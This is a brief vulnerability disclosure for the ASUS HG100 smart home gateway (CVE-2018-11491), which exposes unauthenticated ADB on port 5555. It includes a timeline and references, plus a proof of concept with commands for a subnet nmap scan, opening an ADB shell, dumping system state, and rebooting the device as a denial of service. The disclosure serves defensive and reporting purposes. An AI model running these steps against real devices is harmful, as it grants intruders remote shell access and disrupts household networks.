Description: ASUS HG100 devices with firmware before 1.05.12 allow unauthenticated access, leading to remote command execution.
This vulnerability was discovered by Mars Cheng at National Center for Cyber Security Technology (NCCST)
Introduction ASUS HG100 SmartHome GateWay
| Length x width x height | Weight | Wireless connection |
|---|---|---|
| 152 x 67 x 167 mm | 256g | WiFi 802.11b/g/n ; ZigBee PRO ; BlueTooth 4.0 |
Proof of Concept
1.Confirm IP
nmap --scanflags SYN 192.168.0.0/24
- Port 5555 open
2.Connect port 5555 with ADB
adb connect 192.168.0.100
adb shell
id
dumpstate
- Show system process detail
3.Reboot device and Denial of Service
reboot
- Check device status
Timeline
- February 6, 2018 Reported to ASUS Security
- July 3, 2018 Patch released
Reference
[1] https://www.asus.com/tw/News/qnEosWKPVDpmOeqL
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11491
